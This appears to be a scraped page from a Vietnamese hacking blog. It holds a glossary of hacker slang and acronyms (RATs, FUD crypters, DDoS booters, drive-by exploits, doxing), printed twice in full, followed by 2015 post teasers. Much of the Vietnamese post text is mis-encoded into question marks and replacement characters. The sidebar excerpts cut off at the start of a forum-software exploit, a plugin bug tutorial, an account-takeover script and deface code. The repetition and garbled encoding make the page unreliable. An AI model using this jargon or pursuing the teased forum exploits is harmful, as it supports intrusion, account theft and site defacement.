Transmission Control Protocol, creates connections and exchanges packets of data.
★ UDP =
User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing.
★ VPN =
Virtual Private Network
★ VPS =
Virtual Private Server
★ XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system in order to be able to get back in at a later time.
Binary =
A numbering system in which there are only two possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
Bot =
A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.
Cracker =
A specific type of hacker who decrypts passwords or breaks software copy protection schemes.
DDoS =
Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.
Deface =
A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.
DOX =
Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.
Encryption = I
n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.
Exploit =
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.
FUD =
Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.
IP Address =
On the Internet, your IP address is the unique number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit it.
Keylogger =
A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for a long time.
Packet =
Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone network.
Proxy =
A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.
Resolver =
Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.
Reverse Engineering =
A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.
Root =
Highest permission level on a computer, able to modify anything on the system without restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.
Shell =
The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.
Social Engineer =
Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.
Spoof =
The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.
VPS =
The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally
equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.
Capuchino - VHB Group
Distributed Denial of Service
★ DrDoS =
Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.
★ FTP =
File Transfer Protocol. Used for transferring files over an FTP server.
★ FUD =
Fully Undetectable
★ Hex =
In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.
★ HTTP =
Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.
★ IRC =
Internet Relay Chat. Transmiting text messages in real time between online users.
★ JDB =
Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability.
★ Malware =
Malicious Software
★ Nix =
Unix based operating system, usually refered to here when refering to DoS'ing.
★ POP3 =
This is the most popular protocol for picking up e-mail from a server.
★ R.A.T = Remote Administration Tool
★ SDB =
Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user)
★ SE =
Social Engineering
★ Skid =
Script Kid/Script Kiddie
★ SMTP =
A TCP/IP protocol used in sending and receiving e-mail.
★ SQL =
Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection."
★ SSH =
Secure Shell, used to connect to Virtual Private Servers.
★ TCP =
Transmission Control Protocol, creates connections and exchanges packets of data.
★ UDP =
User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing.
★ VPN =
Virtual Private Network
★ VPS =
Virtual Private Server
★ XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system in order to be able to get back in at a later time.
Binary =
A numbering system in which there are only two possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
Bot =
A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.
Cracker =
A specific type of hacker who decrypts passwords or breaks software copy protection schemes.
DDoS =
Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.
Deface =
A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.
DOX =
Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.
Encryption = I
n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.
Exploit =
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.
FUD =
Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.
IP Address =
On the Internet, your IP address is the unique number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit it.
Keylogger =
A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for a long time.
Packet =
Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone network.
Proxy =
A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.
Resolver =
Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.
Reverse Engineering =
A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.
Root =
Highest permission level on a computer, able to modify anything on the system without restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.
Shell =
The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.
Social Engineer =
Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.
Spoof =
The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.
VPS =
The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally
equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.
Capuchino - VHB Group
Thứ Hai, 18 tháng 5, 2015
S?a l?i nh�n v?t �?ng im ho?c t? di chuy?n trong CF 2.0
J2TeaM J2TeaM Tools Software Tutorials |
| S?a l?i nh�n v?t �?ng im ho?c t? di chuy?n trong CF 2.0 |
S?a l?i nh�n v?t �?ng im ho?c t? di chuy?n trong CF 2.0
Ch?c nhi?u b?n ch�i CF 2.0 (? VN g?i l� �?t K�ch) �? nhi?u l?n g?p tr�?ng h?p �ang ch�i th? nh�n v?t b?ng d�ng �?ng im kh�ng th? n�o �i?u khi?n ��?c, ho?c t? d�ng di chuy?n m� ng�?i ch�i kh�ng ki?m so�t ��?c. V?y l�m sao �? kh?c ph?c l?i n�y? C�c b?n s? bi?t ngay sau khi �?c xong b�i vi?t n�y!Read More
Thứ Tư, 13 tháng 5, 2015
K�ch ho?t "T?t ti?ng tab" tr�n Google Chrome
Chrome Google Tutorials |
| H�?ng d?n k�ch ho?t t�nh n�ng "T?t ti?ng tab" tr�n Google Chrome |
Read More
Thứ Ba, 12 tháng 5, 2015
CyberGhost VPN Premium Key (B?n quy?n 3 th�ng)
Security Software |
| CyberGhost VPN Premium Key (B?n quy?n 3 th�ng) |
CyberGhost VPN l� g??
CyberGhost VPN l� m?t ph?n m?m cung c?p d?ch v? VPN mi?n ph�, m?t c�ch c�ch nhanh ch�ng, ��n gi?n v� hi?u qu? �? b?o v? s? ri�ng t� tr?c tuy?n c?a b?n, l�?t web ?n danh ho?c truy c?p c�c trang web b? ch?n ho?c b? ki?m duy?t n?i dung. N� cung c?p s? an to�n h�ng �?u v� ?n danh m� kh�ng qu� ph?c t?p �? s? d?ng ho?c l�m ch?m k?t n?i Internet c?a b?n.Chủ Nhật, 10 tháng 5, 2015
C?nh b�o trang web mokhoa.cf l?a �?o!
IT News Phishing Security |
| C?nh b�o trang web www.mokhoa.cf l?a �?o! |
Trong l�c �ang l�?t Facebook th? b?t g?p m?t b�i ��ng trong nh�m Game8 gi?i thi?u m?t trang web gi�p m? kh�a t�i kho?n CF (�?t K�ch) b? kh�a. ��ng l�c �ang r?nh r?i n�n t�i c?ng v�o ng� th? xem th? n�o. Khi k�o xu?ng d�?i m?t ch�t, t�i li?n n?y sinh s? nghi ng? khi th?y ph?n b?ng gi� ��ng k? t�i kho?n (�? s? d?ng ph?n m?m) v� m?t bi?u m?u thanh to�n qua th? �i?n tho?i - c� l? l� t�ch h?p th�ng qua h? th?ng thanh to�n c?a GameBank ho?c B?o Kim. H�m nay t�i s? ph�n t�ch r? r�ng v? ho?t �?ng c?a ph?n m?m n�y, li?u n� c� ph?i l� m?t ph?n m?m gi�p m? kh�a t�i kho?n CF kh�ng, hay ch? l� m?t tr? l?a b?p.
Thứ Ba, 5 tháng 5, 2015
Chuy?n Truy c?p ?n danh th�nh ch? �? m?c �?nh tr�n Chrome
Chrome Google Security Tutorials |
| Chuy?n Truy c?p ?n danh th�nh ch? �? m?c �?nh tr�n Chrome |
Ng�y nay, quy?n ri�ng t� l� m?i quan t�m l?n nh?t tr�n th? gi?i. Nh?ng ng�?i nh?n th?c ��?c h?u qu? c?a h�nh vi vi ph?m quy?n ri�ng t� �ang s? d?ng nh?ng c�ch kh�c nhau �? b?o v? m?nh. M?i ��y, �? gi? s? ri�ng t� v? l?ch s? t?m ki?m c?a b?n, Google �? cho ph�p c�c t�y ch?n t?i v� x�a l?ch s? t?m ki?m c?a b?n. Nh�ng h? kh�ng h?a r?ng n� l� an to�n 100%. V? v?y t�i ki?n ngh? c�c b?n s? d?ng ch? �? ?n danh (c� h?u h?t trong nh?ng tr?nh duy?t ph? bi?n hi?n nay) �? ho�n to�n v� danh khi l�?t web.
Ch? �? ?n danh c?n ��?c g?i l� "ch? �? khi�u d�m" (porn mode - l? do th? ch?c ai c?ng hi?u), nh�ng ngo�i vi?c th?a m?n b?n n�ng c?a b?n th? c?n c� r?t nhi?u l? do kh�c �? k�ch ho?t ch? �? ?n danh. H?y t?m hi?u th�m m?t ch�t v? ch? �? duy?t web n�y c?ng nh� l?i th? c?a n�.
Read MoreThứ Hai, 4 tháng 5, 2015
C�c c�ng c?, add-on Firefox h?u �ch cho nh� ph�t tri?n web
FireFox Tools Web Developer |
| C�c c�ng c?, add-on Firefox h?u �ch cho nh� ph�t tri?n web |
M?t trong nh?ng m?c ti�u lu�n ��?c quan t�m c?a Firefox l� l�m cho cu?c s?ng c?a c�c nh� ph�t tri?n web tr? n�n d? d�ng v� hi?u qu? nh?t c� th? b?ng c�ch cung c?p c�c c�ng c? v� m?t tr?nh duy?t web r?t m? r?ng �? cho ph�p m?i ng�?i t?o ra nh?ng �i?u tuy?t v?i.
Danh s�ch n�y li?t k� r?t nhi?u c�c c�ng c?, add-on v� c�c t�y ch?n c� s?n d�nh cho nh� ph�t tri?n web s? d?ng tr?nh duy?t Firefox.
Thứ Bảy, 2 tháng 5, 2015
C�c c�ng c? b?o m?t c?a Google (Security Tools)
Google Hacking Tools Security Tools |
| Google Security Tools |
Google lu�n coi tr?ng b?o m?t h? th?ng c?a h? c?ng nh� b?o v? d? li?u c?a ng�?i d�ng. V� Google c?ng mu?n gi�p �? ng�?i kh�c t�ng �? b?o m?t c?a t?t c? c�c h? th?ng k?t n?i Internet. M?t trong nh?ng c�ch h? l�m �i?u n�y �� l� ph�t h�nh m?t s? c�ng c? b?o m?t d�?i d?ng m? ngu?n m?.
Đăng ký:
Bài đăng (Atom)
Popular Posts
-
<?php /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP ...
-
Bug cho forum sài MyBB với cái Albums plugin version 0.9 Tut: 1. Tạo cái user trên forum victim. 2. Tạo cái Album rồi upload hình lên. ->...
-
DOWNLOAD Pass unrar: quylevhb.blogspot.com ___________________________________ _________________/\ | | | \ ... -
Code này có tác dụng là khi upload vào thư mục root của forum VBB (Ngang hàng index.php) các bạn có khả năng đăng nhập vào nick bất cứ thà...
-
Code n�y c� t�c d?ng l� khi upload v�o th� m?c root c?a forum VBB (Ngang h�ng index.php) c�c b?n c� kh? n�ng ��ng nh?p v�o nick b?t c? th�...
-
Code index dùng để deface hiện nay có rất nhiều, Với nhiều loại index deface khác nhau. Hôm nay mình share toàn bộ code dùng để index deface... -
Đầu tiên nói trước đây chỉ là code hạn chế mức độ của DDOS và ngăn chặn các cuộc tấn công DDOS thông thường mà thôi. Giới thiệu: Code này d... -
B�i vi?t n�y s? gi�p b?n gi?i ��p m?t s? th?c m?c nh� " J2TeaM l� g?? ", "T?i sao g?i l� J2TeaM m� kh�ng ph?i J3TeaM hay J4... -
Ví dụ ta có một đoạn code bị mã hóa dạng như này: eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%... -
FBHT (Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform T...
Bài đăng phổ biến
-
<?php /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP ...
-
Bug cho forum sài MyBB với cái Albums plugin version 0.9 Tut: 1. Tạo cái user trên forum victim. 2. Tạo cái Album rồi upload hình lên. ->...
-
DOWNLOAD Pass unrar: quylevhb.blogspot.com ___________________________________ _________________/\ | | | \ ... -
Code này có tác dụng là khi upload vào thư mục root của forum VBB (Ngang hàng index.php) các bạn có khả năng đăng nhập vào nick bất cứ thà...
-
Code n�y c� t�c d?ng l� khi upload v�o th� m?c root c?a forum VBB (Ngang h�ng index.php) c�c b?n c� kh? n�ng ��ng nh?p v�o nick b?t c? th�...
-
Code index dùng để deface hiện nay có rất nhiều, Với nhiều loại index deface khác nhau. Hôm nay mình share toàn bộ code dùng để index deface... -
Đầu tiên nói trước đây chỉ là code hạn chế mức độ của DDOS và ngăn chặn các cuộc tấn công DDOS thông thường mà thôi. Giới thiệu: Code này d... -
B�i vi?t n�y s? gi�p b?n gi?i ��p m?t s? th?c m?c nh� " J2TeaM l� g?? ", "T?i sao g?i l� J2TeaM m� kh�ng ph?i J3TeaM hay J4... -
Ví dụ ta có một đoạn code bị mã hóa dạng như này: eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%... -
FBHT (Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform T...
WE ARE ANONYMOUS
